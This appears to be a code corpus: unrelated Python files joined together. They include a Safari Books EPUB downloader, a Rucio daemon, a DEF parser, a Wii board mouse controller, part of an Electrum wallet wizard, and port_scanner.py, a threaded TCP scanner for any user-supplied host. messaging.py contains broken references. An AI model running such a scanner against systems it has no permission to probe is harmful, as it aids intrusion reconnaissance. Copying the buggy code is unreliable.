sr, c, mx = SafariBooks.parse_toc(cc["children"], c, mx)
r += sr
r += "</navPoint>\n"
return r, c, mx
def create_toc(self):
response = self.requests_provider(urljoin(self.api_url, "toc/"))
if response == 0:
self.display.exit("API: unable to retrieve book chapters. "
"Don't delete any files, just run again this program"
" in order to complete the `.epub` creation!")
response = response.json()
if not isinstance(response, list) and len(response.keys()) == 1:
self.display.exit(
self.display.api_error(response) +
" Don't delete any files, just run again this program"
" in order to complete the `.epub` creation!"
)
navmap, _, max_depth = self.parse_toc(response)
return self.TOC_NCX.format(
(self.book_info["isbn"] if self.book_info["isbn"] else self.book_id),
max_depth,
self.book_title,
", ".join(aut.get("name", "") for aut in self.book_info.get("authors", [])),
navmap
)
def create_epub(self):
open(os.path.join(self.BOOK_PATH, "mimetype"), "w").write("application/epub+zip")
meta_info = os.path.join(self.BOOK_PATH, "META-INF")
if os.path.isdir(meta_info):
self.display.log("META-INF directory already exists: %s" % meta_info)
else:
os.makedirs(meta_info)
open(os.path.join(meta_info, "container.xml"), "wb").write(
self.CONTAINER_XML.encode("utf-8", "xmlcharrefreplace")
)
open(os.path.join(self.BOOK_PATH, "OEBPS", "content.opf"), "wb").write(
self.create_content_opf().encode("utf-8", "xmlcharrefreplace")
)
open(os.path.join(self.BOOK_PATH, "OEBPS", "toc.ncx"), "wb").write(
self.create_toc().encode("utf-8", "xmlcharrefreplace")
)
zip_file = os.path.join(PATH, "Books", self.book_id)
if os.path.isfile(zip_file + ".zip"):
os.remove(zip_file + ".zip")
shutil.make_archive(zip_file, 'zip', self.BOOK_PATH)
os.rename(zip_file + ".zip", os.path.join(self.BOOK_PATH, self.book_id) + ".epub")
# MAIN
if __name__ == "__main__":
arguments = argparse.ArgumentParser(prog="safaribooks.py",
description="Download and generate an EPUB of your favorite books"
" from Safari Books Online.",
add_help=False,
allow_abbrev=False)
login_arg_group = arguments.add_mutually_exclusive_group()
login_arg_group.add_argument(
"--cred", metavar="<EMAIL:PASS>", default=False,
help="Credentials used to perform the auth login on Safari Books Online."
" Es. ` --cred \"account_mail@mail.com:password01\" `."
)
login_arg_group.add_argument(
"--login", action='store_true',
help="Prompt for credentials used to perform the auth login on Safari Books Online."
)
arguments.add_argument(
"--no-cookies", dest="no_cookies", action='store_true',
help="Prevent your session data to be saved into `cookies.json` file."
)
arguments.add_argument(
"--kindle", dest="kindle", action='store_true',
help="Add some CSS rules that block overflow on `table` and `pre` elements."
" Use this option if you're going to export the EPUB to E-Readers like Amazon Kindle."
)
arguments.add_argument(
"--preserve-log", dest="log", action='store_true', help="Leave the `info_XXXXXXXXXXXXX.log`"
" file even if there isn't any error."
)
arguments.add_argument("--help", action="help", default=argparse.SUPPRESS, help='Show this help message.')
arguments.add_argument(
"bookid", metavar='<BOOK ID>',
help="Book digits ID that you want to download. You can find it in the URL (X-es):"
" `" + SAFARI_BASE_URL + "/library/view/book-name/XXXXXXXXXXXXX/`"
)
args_parsed = arguments.parse_args()
if args_parsed.cred or args_parsed.login:
user_email = ""
pre_cred = ""
if args_parsed.cred:
pre_cred = args_parsed.cred
else:
user_email = input("Email: ")
passwd = getpass.getpass("Password: ")
pre_cred = user_email + ":" + passwd
parsed_cred = SafariBooks.parse_cred(pre_cred)
if not parsed_cred:
arguments.error("invalid credential: %s" % (
args_parsed.cred if args_parsed.cred else (user_email + ":*******")
))
args_parsed.cred = parsed_cred
else:
if args_parsed.no_cookies:
arguments.error("invalid option: `--no-cookies` is valid only if you use the `--cred` option")
if len(args_parsed.bookid) > 0:
book_url_regex = r"['\"]*http[s]?:\/\/[a-zA-Z0-9.\-/]+\/(\d{10,15})\/*['\"]*" # Matches book URL
pattern = re.compile(book_url_regex)
matchURL = re.search(pattern, args_parsed.bookid)
book_id_regex = r"['\"]*(\d{10,15})/*['\"]*" # Matches book ID
pattern = re.compile(book_id_regex)
matchID = re.search(pattern, args_parsed.bookid)
if matchURL:
bookID = matchURL.group(1)
elif matchID:
bookID = matchID.group(1)
else:
bookID = None
arguments.error("Invalid book ID or URL")
if str.isdecimal(bookID):
args_parsed.bookid = bookID
else:
arguments.error("Invalid book ID")
else:
arguments.error("Book ID must not be empty")
SafariBooks(args_parsed)
# Hint: do you want to download more then one book once, initialized more than one instance of `SafariBooks`...
sys.exit(0)
|
port_scanner.py
|
#!/usr/bin/python
################
# Port Scanner - A Multi-threaded approach
# Scans well-known system ports and returns if they are open or closed.
# To increase performance of scanning, adjust delay where necessary.
################
import socket, threading
host = raw_input("Enter an address to scan: ")
ip = socket.gethostbyname(host)
threads = []
open_ports = {}
def try_port(ip, port, delay, open_ports):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #socket.AF_INET, socket.SOCK_STREAM
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.settimeout(delay)
result = sock.connect_ex((ip, port))
if result == 0:
open_ports[port] = 'open'
return True
else:
open_ports[port] = 'closed'
return None
def scan_ports(ip, delay):
for port in range(0, 1023):
thread = threading.Thread(target=try_port, args=(ip, port, delay, open_ports))
threads.append(thread)
for i in range(0, 1023):
threads[i].start()
for i in range(0, 1023):
threads[i].join()
for i in range (0, 1023):
if open_ports[i] == 'open':
print '\nport number ' + str(i) + ' is open'
if i == 1022:
print '\nscan complete!'
if __name__ == "__main__":
scan_ports(ip, 3)
|
messaging.py
|
from threading import Thread
from traceback import format_exc
import zmq
import logging
class MessageQueue():
def __init__(self):
self.__handlers = {}
self.__zmq_context = zmq.Context()
self.__out_socket = self.__zmq_context.socket(zmq.PUSH)
self.__thread = None
self.__protocol = None
self.__port = 0
self.__interface = None
self.on_recv = None
@property
def port(self):
return self.__port
@property
def interface(self):
return self.__interface
@property
def protocol(self):
return self.__protocol
def address(self):
return '%s://%s:%s' % (protocol, interface, port)
def connect_output(self, *addresses):
for address in addresses:
self.__socket.connect(addresses)
def start_listening(self, on_recv=None, port=0, protocol='tcp', interface='*'):
if self.__thread:
return
if on_recv:
self.on_recv = on_recv
self.__protocol = protocol
self.__interface = interface
def listen():
context = zmq.Context()
socket = context.socket(zmq.PULL)
if port:
self.__port = port
socket.bind(self.address)
else:
self.__port = socket.bind_to_random_port('%s://%s', protocol, interface)
while True:
try:
message = socket.recv()
if on_recv:
on_recv(message)
except Exception as e:
logging.error(format_exc())
self.__thread = None
self.__thread = Thread(target=listen)
self.__thread.daemon = True
self.__thread.start()
def send(self, message):
self.__out_socket.send(message)
_instances = {}
@classmethod
def instance(cls, name='MessageQueue'):
try:
return cls._instances[name]
except:
cls._instances[name] = cls()
return cls._instances[name]
|
def_parser.py
|
"""
Author: Geraldo Pradipta
BSD 3-Clause License
Copyright (c) 2019, The Regents of the University of Minnesota
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of the copyright holder nor the names of its
contributors may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
© 2019 GitHub, Inc.
"""
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import re
import Class as cl
#from build_RC_tree import build_RC_tree
from build_path import build_path
from build_path import parse_net
import via_section_def_parser as def_via
from lefParser import compute_via_number_of_cuts
import global_var as glob
def def_parser(def_file, pins, nets, cell_coor_dict, load_cap_dict, cell_dimension, buildPath = True):
print('# READING DEF')
with open(def_file) as f:
blocks = []
mapping_number = 1
# Parsing Components Section
parsing_component = False
comp_syn = False
cur_comp =[]
# NET BOOLEAN
find_net = False
find_data = False
# PIN BOOLEAN
find_pin = False
pin_info = False
# VIAS BOOLEAN
find_vias = False
via_info = False
for line in f:
""" HEADER SECTION"""
# Finding the PER UNIT VALUE
if re.search('UNITS DISTANCE MICRONS',line,flags=re.IGNORECASE):
data = re.findall(r'\d+', line)
glob.UNIT_DISTANCE = (int(data[0]))
if re.match('^VERSION\s*(\d+\.?\d*)\s*[;]', line):
def_version = re.match('^VERSION\s*(\d+\.?\d*)\s*[;]', line).group(1)
if re.match('^DIVIDERCHAR\s*["](.+)["]\s*[;]', line):
glob.DIVIDER = re.match('^DIVIDERCHAR\s*["](.+)["]\s*[;]', line).group(1)
if re.match('^BUSBITCHARS\s*["](.+)["]\s*[;]', line):
glob.BUS_CHAR = re.match('^BUSBITCHARS\s*["](.+)["]\s*[;]', line).group(1)
if re.match('^DESIGN\s*\w+\s*[;]', line):
glob.DESIGN = re.match('^DESIGN\s*(\w+)\s*[;]', line).group(1)
"""" END HEADER SECTION """
"""FILLING THE FIRST PART OF THE RECT CLASS"""
if re.match('^[\t ]*COMPONENTS \d+',line, flags=re.IGNORECASE):
parsing_component = True
continue
if re.match('^[\t ]*END COMPONENTS',line, flags=re.IGNORECASE):
parsing_component = False
# Create dictionary that contains all the COMPONENTS info
create_block_dict(blocks, load_cap_dict, cell_dimension, cell_coor_dict)
continue
if parsing_component:
if re.match('^[\t ]*-[\t ]+\w+[\t ]+\w+',line):
comp_name = re.search(r'[\t ]*-[\t ]+(\w+)[\t ]+(\w+)', line)
cur_comp = cl.Component(name = comp_name.group(1), cell=comp_name.group(2), number = mapping_number)
comp_syn = True
mapping_number += 1
if re.search('PLACED|FIXED|COVER',line,flags=re.IGNORECASE) and comp_syn:
comp_loc = re.search(r'[+] (PLACED|FIXED|COVER)\s+[(] ([-+]?\d+\.?\d*)\s+([-+]?\d+\.?\d*) [)] (\w+)', line)
cur_comp.set_location(comp_loc.group(2), comp_loc.group(3))
cur_comp.set_orientation(comp_loc.group(4))
if re.search('PLACED|FIXED|COVER',line,flags=re.IGNORECASE) and comp_syn:
Property = re.search(r'[+] (PROPERTY)\s+(\w+)\s+([-+]?\d+\.?\d*|\w+)', line)
if Property != None:
cur_comp.set_property([Property.group(2), Property.group(3)])
if re.search(';',line) and comp_syn: #semicolon at the begining of the line
comp_syn = False
blocks.append(cur_comp)
""" FIRST PART ENDS HERE """
""" PINS START """
if re.match('^[\t ]*PINS \d+',line, flags=re.IGNORECASE):
find_pin = True
continue
if re.match('^[\t ]*END PINS*',line, flags=re.IGNORECASE):
find_pin = False
continue
if find_pin:
if re.match('^\s*-\s+(\w+)',line):
pin_info = True
pin_class = cl.Pin(number = mapping_number)
pin_class.set_name(re.match('^\s*-\s+(\S+)\s*',line).group(1))
mapping_number += 1
if pin_info:
if re.match('. .+',line):
data = re.findall(r'(?![(|)|+|;])\S+', line)
processPinData(pin_class, data)
if re.search(';',line):
pin_info = False
add_pin_info_toDict(pin_class, pins)
continue
""" END PINS """
""" VIAS SECTION """
if find_vias:
if re.search(r';', line):
via_info = False
# Set the cut layer of the via
num_cuts = compute_via_number_of_cuts(cur_via, glob.TECH_LEF_DICT)
cur_via.set_viaCuts(num_cuts)
def_via.append_via_data_to_dict(cur_via, glob.TECH_LEF_DICT)
if via_info:
def_via.parse_def_via_section(line, cur_via, glob.TECH_LEF_DICT)
if re.match(r'^\s*[-]\s+(\w+)', line):
via_name = re.findall(r'\S+', line)
via_name = (via_name[1])
cur_via = cl.LEF_VIA_Info(via_name = via_name)
via_info = True
if re.match('^VIAS\s+\d+\s+[;]', line):
find_vias = True
if re.match('^END VIAS*', line):
find_vias = False
""" END VIA SECTION """
""" NETS PART """
if re.match('^[\t ]*NETS \d+',line, flags=re.IGNORECASE):
find_net = True
print('# Process Nets information...')
net_count = 0
continue
if re.match('^[\t ]*END NETS*',line, flags=re.IGNORECASE):
find_net = False
print('# Finsihed processing Nets information')
print('# Total Net Count: {}'.format(net_count))
continue
if find_net == True:
if re.match('^[\t ]*-[\t ]+\w+',line):
mapped = False
data = re.findall(r'\S+', line)
# Create an Instance of a net
cur_net = cl.NET(data[1])
cur_net.add_cell = blocks
# ADDING THE MAPPING NUMBER OF THE NET TO THE PIN INFO
if data[1] in pins:
cur_net.number = pins[data[1]]['number']
mapped = True
if not mapped:
cur_net.number = mapping_number
mapping_number += 1
find_data = True
# End of the particular NET, process the wire data
if re.search('^\s*;',line): #semicolon at the begining of the line
find_data = False
net_count += 1
if cur_net.wire_list == []:
nets.append(cur_net)
print('# Warning: Net {} does not contain any interconnect information!'.format(cur_net.name))
continue
# Use for SPEF writer, creating PATH from DEF
if buildPath:
build_path(cur_net, cell_coor_dict, pins)
nets.append(cur_net)
continue
if find_data:
parse_net(line, cur_net, cell_coor_dict)
""" END NETS """
# if buildPath:
# import multiprocessing as mp
# print('# Building Path ...')
# processes = []
# end = 0
#
# cpu_count = mp.cpu_count() + 10
# for i in range (cpu_count):
# start = end
#
# if i == cpu_count-1:
# end = len(nets)
# else:
# end = (i+1) * int(len(nets)/cpu_count)
#
# p = mp.Process(target=fork_build_path, args=(start, end, nets, cell_coor_dict, pins,))
# processes.append(p)
# p.start()
#
# for process in processes:
# process.join()
print('# Finish Rading DEF')
# =============================================================================
# Desc: Determine whether the cell is an input or output
# Input: The NET class object and the data itself
# =============================================================================
def create_block_dict(blocks, load_cap_dict, cell_dimension, cell_coor_dict):
for block in blocks:
cell_coor_dict[block.compName] = {'x' : block.x, 'y' : block.y, 'number' : block.number, 'cell_name' : block.type,
'pin' : load_cap_dict[block.type], 'orient' : block.orient, 'dimension' : cell_dimension[block.type]}
### EMPTY THE DICTIONARY
del cell_dimension
del load_cap_dict
# =============================================================================
#
# =============================================================================
def processPinData(pin_class, data):
for i in range (0, len(data)):
if re.search('NET', data[i]):
pin_class.set_net(data[i+1])
i += 1
continue
if re.search('DIRECTION', data[i]):
pin_class.set_direction(data[i+1])
i += 1
continue
if re.search('LAYER', data[i]):
add = 1
if data[i+2] == 'MASK' or data[i+2] == 'SPACING' or data[i+2] == 'DESIGNRULEWIDTH':
add = 3
pin_class.set_layer(data[i+1])
pin_class.set_dimension([data[i+add+1], data[i+add+2], data[i+add+3], data[i+add+4]])
i += (add + 4)
continue
if re.search('COVER|FIXED|PLACED', data[i]):
pin_class.set_x(data[i+1])
pin_class.set_y(data[i+2])
pin_class.set_orientation(data[i+3])
i += 3
continue
def add_pin_info_toDict(pin_class, pin_dict):
pin_dict[pin_class.name] = {'NET' : pin_class.net, 'DIRECTION' : pin_class.direction, 'LAYER' : pin_class.layer,
'X' : pin_class.x, 'Y' : pin_class.y, 'dimension' : pin_class.dimension,
'orientation' : pin_class.orientation, 'number' : pin_class.number }
def processPropertyInfo(cur_net, data):
for i in range (1, len(data)-1, 2):
cur_net.set_property([data[i], data[i+1]])
def fork_build_path(start, end, nets, cell_coor_dict, pins,):
for i in range (start,end):
if nets[i].wire_list == []:
continue
build_path(nets[i], cell_coor_dict, pins)
|
mouse_control.py
|
import wiiboard
import pygame
import time
import pyautogui
import threading
pyautogui.FAILSAFE = False
THRESHOLD = 5
MOVEMENT_SCALE = 2
mouse_move_data = None
done = False
click = False
key_sim = None
def avg(x,y):
return (x+y)/2
def threshold(x):
return x**2 if abs(x) > THRESHOLD else 0
def move_mouse(tr,br,bl,tl):
tAvg = avg(tr, tl)
bAvg = avg(br, bl)
rAvg = avg(tr, br)
lAvg = avg(tl, bl)
mvVert = threshold(bAvg - tAvg) * MOVEMENT_SCALE
mvHorz = threshold(rAvg - lAvg) * MOVEMENT_SCALE
pyautogui.moveRel(mvHorz, mvVert, 1)
def mouse_control():
global mouse_move_data
global done
global click
while(not done):
if not mouse_move_data is None:
move_mouse(mouse_move_data.topRight,
mouse_move_data.bottomRight,
mouse_move_data.bottomLeft,
mouse_move_data.topLeft)
mouse_move_data = None
def main():
global mouse_move_data
global done
board = wiiboard.Wiiboard()
pygame.init()
address = board.discover()
board.connect(address) #The wii board must be in sync mode at this time
time.sleep(0.1)
board.setLight(True)
# make the thread for mouse control
mouse_thread = threading.Thread(target=mouse_control)
mouse_thread.start();
while (not done):
time.sleep(0.05)
for event in pygame.event.get():
if event.type == wiiboard.WIIBOARD_CONNECTED:
print "The board is active. You know not what you have done."
elif event.type == wiiboard.WIIBOARD_DISCONNECTED:
print "You have disconnected the board."
elif event.type == wiiboard.WIIBOARD_MASS:
if (event.mass.totalWeight > 5): #10KG. otherwise you would get alot of useless small events!
if mouse_move_data is None:
print "updating mouse_move_data"
mouse_move_data = event.mass
#etc for topRight, bottomRight, bottomLeft. buttonPressed and buttonReleased also available but easier to use in seperate event
elif event.type == wiiboard.WIIBOARD_BUTTON_PRESS:
print "Button pressed!"
elif event.type == wiiboard.WIIBOARD_BUTTON_RELEASE:
print "Button released"
done = True
#Other event types:
#wiiboard.WIIBOARD_CONNECTED
#wiiboard.WIIBOARD_DISCONNECTED
board.disconnect()
pygame.quit()
#Run the script if executed
if __name__ == "__main__":
main()
|
injector.py
|
# Copyright 2015-2018 CERN for the benefit of the ATLAS collaboration.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# - Martin Barisits <martin.barisits@cern.ch>, 2015-2017
# - Vincent Garonne <vgaronne@gmail.com>, 2018
"""
Judge-Injector is a daemon to asynchronously create replication rules
"""
import logging
import os
import socket
import sys
import threading
import time
import traceback
from copy import deepcopy
from datetime import datetime, timedelta
from re import match
from random import randint
from sqlalchemy.exc import DatabaseError
from rucio.common.config import config_get
from rucio.common.exception import (DatabaseException, RuleNotFound, RSEBlacklisted,
ReplicationRuleCreationTemporaryFailed, InsufficientAccountLimit)
from rucio.core.heartbeat import live, die, sanity_check
from rucio.core.rule import inject_rule, get_injected_rules, update_rule
from rucio.core.monitor import record_counter
graceful_stop = threading.Event()
logging.basicConfig(stream=sys.stdout,
level=getattr(logging,
config_get('common', 'loglevel',
raise_exception=False,
default='DEBUG').upper()),
format='%(asctime)s\t%(process)d\t%(levelname)s\t%(message)s')
def rule_injector(once=False):
"""
Main loop to check for asynchronous creation of replication rules
"""
hostname = socket.gethostname()
pid = os.getpid()
current_thread = threading.current_thread()
paused_rules = {} # {rule_id: datetime}
# Make an initial heartbeat so that all judge-inectors have the correct worker number on the next try
live(executable='rucio-judge-injector', hostname=hostname, pid=pid, thread=current_thread, older_than=2 * 60 * 60)
graceful_stop.wait(1)
while not graceful_stop.is_set():
try:
# heartbeat
heartbeat = live(executable='rucio-judge-injector', hostname=hostname, pid=pid, thread=current_thread, older_than=2 * 60 * 60)
start = time.time()
# Refresh paused rules
iter_paused_rules = deepcopy(paused_rules)
for key in iter_paused_rules:
if datetime.utcnow() > paused_rules[key]:
del paused_rules[key]
rules = get_injected_rules(total_workers=heartbeat['nr_threads'] - 1,
worker_number=heartbeat['assign_thread'],
limit=100,
blacklisted_rules=[key for key in paused_rules])
logging.debug('rule_injector[%s/%s] index query time %f fetch size is %d' % (heartbeat['assign_thread'], heartbeat['nr_threads'] - 1, time.time() - start, len(rules)))
if not rules and not once:
logging.debug('rule_injector[%s/%s] did not get any work (paused_rules=%s)' % (heartbeat['assign_thread'], heartbeat['nr_threads'] - 1, str(len(paused_rules))))
graceful_stop.wait(60)
else:
for rule in rules:
rule_id = rule[0]
logging.info('rule_injector[%s/%s]: Injecting rule %s' % (heartbeat['assign_thread'], heartbeat['nr_threads'] - 1, rule_id))
if graceful_stop.is_set():
break
try:
start = time.time()
inject_rule(rule_id=rule_id)
logging.debug('rule_injector[%s/%s]: injection of %s took %f' % (heartbeat['assign_thread'], heartbeat['nr_threads'] - 1, rule_id, time.time() - start))
except (DatabaseException, DatabaseError), e:
if match('.*ORA-00054.*', str(e.args[0])):
paused_rules[rule_id] = datetime.utcnow() + timedelta(seconds=randint(60, 600))
record_counter('rule.judge.exceptions.LocksDetected')
logging.warning('rule_injector[%s/%s]: Locks detected for %s' % (heartbeat['assign_thread'], heartbeat['nr_threads'] - 1, rule_id))
elif match('.*QueuePool.*', str(e.args[0])):
logging.warning(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
elif match('.*ORA-03135.*', str(e.args[0])):
logging.warning(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
else:
logging.error(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
except RSEBlacklisted, e:
paused_rules[rule_id] = datetime.utcnow() + timedelta(seconds=randint(60, 600))
logging.warning('rule_injector[%s/%s]: RSEBlacklisted for rule %s' % (heartbeat['assign_thread'], heartbeat['nr_threads'] - 1, rule_id))
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
except ReplicationRuleCreationTemporaryFailed, e:
paused_rules[rule_id] = datetime.utcnow() + timedelta(seconds=randint(60, 600))
logging.warning('rule_injector[%s/%s]: ReplicationRuleCreationTemporaryFailed for rule %s' % (heartbeat['assign_thread'], heartbeat['nr_threads'] - 1, rule_id))
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
except RuleNotFound, e:
pass
except InsufficientAccountLimit, e:
# A rule with InsufficientAccountLimit on injection hangs there potentially forever
# It should be marked as SUSPENDED
logging.info('rule_injector[%s/%s]: Marking rule %s as SUSPENDED due to InsufficientAccountLimit' % (heartbeat['assign_thread'], heartbeat['nr_threads'] - 1, rule_id))
update_rule(rule_id=rule_id, options={'state': 'SUSPENDED'})
except (DatabaseException, DatabaseError), e:
if match('.*QueuePool.*', str(e.args[0])):
logging.warning(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
elif match('.*ORA-03135.*', str(e.args[0])):
logging.warning(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
else:
logging.critical(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
except Exception, e:
logging.critical(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
if once:
break
die(executable='rucio-judge-injector', hostname=hostname, pid=pid, thread=current_thread)
def stop(signum=None, frame=None):
"""
Graceful exit.
"""
graceful_stop.set()
def run(once=False, threads=1):
"""
Starts up the Judge-Injector threads.
"""
hostname = socket.gethostname()
sanity_check(executable='rucio-judge-injector', hostname=hostname)
if once:
rule_injector(once)
else:
logging.info('Injector starting %s threads' % str(threads))
threads = [threading.Thread(target=rule_injector, kwargs={'once': once}) for i in xrange(0, threads)]
[t.start() for t in threads]
# Interruptible joins require a timeout.
while threads[0].is_alive():
[t.join(timeout=3.14) for t in threads]
|
installwizard.py
|
import sys
import os
from PyQt4.QtGui import *
from PyQt4.QtCore import *
import PyQt4.QtCore as QtCore
import electrum_arg as electrum
from electrum_arg import Wallet, WalletStorage
from electrum_arg.util import UserCancelled, InvalidPassword
from electrum_arg.base_wizard import BaseWizard
from electrum_arg.i18n import _
from seed_dialog import SeedLayout, KeysLayout
from network_dialog import NetworkChoiceLayout
from util import *
from password_dialog import PasswordLayout, PW_NEW
class GoBack(Exception):
pass
MSG_GENERATING_WAIT = _("Electrum is generating your addresses, please wait...")
MSG_ENTER_ANYTHING = _("Please enter a seed phrase, a master key, a list of "
"Argentum addresses, or a list of private keys")
MSG_ENTER_SEED_OR_MPK = _("Please enter a seed phrase or a master key (xpub or xprv):")
MSG_COSIGNER = _("Please enter the master public key of cosigner #%d:")
MSG_ENTER_PASSWORD = _("Choose a password to encrypt your wallet keys.") + '\n'\
+ _("Leave this field empty if you want to disable encryption.")
MSG_RESTORE_PASSPHRASE = \
_("Please enter your seed derivation passphrase. "
"Note: this is NOT your encryption password. "
"Leave this field empty if you did not use one or are unsure.")
class CosignWidget(QWidget):
size = 120
def __init__(self, m, n):
QWidget.__init__(self)
self.R = QRect(0, 0, self.size, self.size)
self.setGeometry(self.R)
self.setMinimumHeight(self.size)
self.setMaximumHeight(self.size)
self.m = m
self.n = n
def set_n(self, n):
self.n = n
self.update()
def set_m(self, m):
self.m = m
self.update()
def paintEvent(self, event):
import math
bgcolor = self.palette().color(QPalette.Background)
pen = QPen(bgcolor, 7, QtCore.Qt.SolidLine)
qp = QPainter()
qp.begin(self)
qp.setPen(pen)
qp.setRenderHint(QPainter.Antialiasing)
qp.setBrush(Qt.gray)
for i in range(self.n):
alpha = int(16* 360 * i/self.n)
alpha2 = int(16* 360 * 1/self.n)
qp.setBrush(Qt.green if i<self.m else Qt.gray)
qp.drawPie(self.R, alpha, alpha2)
qp.end()
def wizard_dialog(func):
def func_wrapper(*args, **kwargs):
run_next = kwargs['run_next']
wizard = args[0]
wizard.back_button.setText(_('Back') if wizard.can_go_back() else _('Cancel'))
try:
out = func(*args, **kwargs)
except GoBack:
wizard.go_back() if wizard.can_go_back() else wizard.close()
return
except UserCancelled:
return
#if out is None:
# out = ()
if type(out) is not tuple:
out = (out,)
apply(run_next, out)
return func_wrapper
# WindowModalDialog must come first as it overrides show_error
class InstallWizard(QDialog, MessageBoxMixin, BaseWizard):
def __init__(self, config, app, plugins, storage):
BaseWizard.__init__(self, config, storage)
QDialog.__init__(self, None)
self.setWindowTitle('Electrum - ' + _('Install Wizard'))
self.app = app
self.config = config
# Set for base base class
self.plugins = plugins
self.language_for_seed = config.get('language')
self.setMinimumSize(600, 400)
self.connect(self, QtCore.SIGNAL('accept'), self.accept)
self.title = QLabel()
self.main_widget = QWidget()
self.back_button = QPushButton(_("Back"), self)
self.next_button = QPushButton(_("Next"), self)
self.next_button.setDefault(True)
self.logo = QLabel()
self.please_wait = QLabel(_("Please wait..."))
self.please_wait.setAlignment(Qt.AlignCenter)
self.icon_filename = None
self.loop = QEventLoop()
self.rejected.connect(lambda: self.loop.exit(0))
self.back_button.clicked.connect(lambda: self.loop.exit(1))
self.next_button.clicked.connect(lambda: self.loop.exit(2))
outer_vbox = QVBoxLayout(self)
inner_vbox = QVBoxLayout()
inner_vbox = QVBoxLayout()
inner_vbox.addWidget(self.title)
inner_vbox.addWidget(self.main_widget)
inner_vbox.addStretch(1)
inner_vbox.addWidget(self.please_wait)
inner_vbox.addStretch(1)
icon_vbox = QVBoxLayout()
icon_vbox.addWidget(self.logo)
icon_vbox.addStretch(1)
hbox = QHBoxLayout()
hbox.addLayout(icon_vbox)
hbox.addSpacing(5)
hbox.addLayout(inner_vbox)
hbox.setStretchFactor(inner_vbox, 1)
outer_vbox.addLayout(hbox)
outer_vbox.addLayout(Buttons(self.back_button, self.next_button))
self.set_icon(':icons/electrum-arg.png')
self.show()
self.raise_()
self.refresh_gui() # Need for QT on MacOSX. Lame.
def run_and_get_wallet(self):
def on_filename():
wallet_folder = os.path.dirname(self.storage.path)
path = unicode(QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder))
if path:
self.name_e.setText(path)
self.storage = WalletStorage(path)
update_layout()
def update_layout():
name = os.path.basename(self.storage.path)
vbox = QVBoxLayout()
hbox = QHBoxLayout()
hbox.addWidget(QLabel(_('Wallet') + ':'))
self.name_e = QLineEdit(text=name)
hbox.addWidget(self.name_e)
button = QPushButton(_('Choose...'))
button.clicked.connect(on_filename)
hbox.addWidget(button)
vbox.addLayout(hbox)
self.pw_e = None
if not self.storage.file_exists():
msg = _("This file does not exist.") + '\n' \
+ _("Press 'Next' to create this wallet, or chose another file.")
vbox.addWidget(QLabel(msg))
elif self.storage.file_exists() and self.storage.is_encrypted():
msg = _("This file is encrypted.") + '\n' + _('Enter your password or choose another file.')
vbox.addWidget(QLabel(msg))
hbox2 = QHBoxLayout()
self.pw_e = QLineEdit('', self)
self.pw_e.setFixedWidth(150)
self.pw_e.setEchoMode(2)
hbox2.addWidget(QLabel(_('Password') + ':'))
hbox2.addWidget(self.pw_e)
hbox2.addStretch()
vbox.addLayout(hbox2)
else:
msg = _("Press 'Next' to open this wallet.")
vbox.addWidget(QLabel(msg))
self.set_layout(vbox, title=_('Electrum wallet'))
if self.pw_e:
self.pw_e.show()
self.pw_e.setFocus()
while True:
update_layout()
if self.storage.file_exists() and not self.storage.is_encrypted():
break
if not self.loop.exec_():
return
if not self.storage.file_exists():
break
if self.storage.file_exists() and self.storage.is_encrypted():
password = unicode(self.pw_e.text())
try:
self.storage.decrypt(password)
break
except InvalidPassword as e:
QMessageBox.information(None, _('Error'), str(e), _('OK'))
continue
except BaseException as e:
traceback.print_exc(file=sys.stdout)
QMessageBox.information(None, _('Error'), str(e), _('OK'))
return
path = self.storage.path
if self.storage.requires_split():
self.hide()
msg = _("The wallet '%s' contains multiple accounts, which are no longer supported in Electrum 2.7.\n\n"
"Do you want to split your wallet into multiple files?"%path)
if not self.question(msg):
return
file_list = '\n'.join(self.storage.split_accounts())
msg = _('Your accounts have been moved to') + ':\n' + file_list + '\n\n'+ _('Do you want to delete the old file') + ':\n' + path
if self.question(msg):
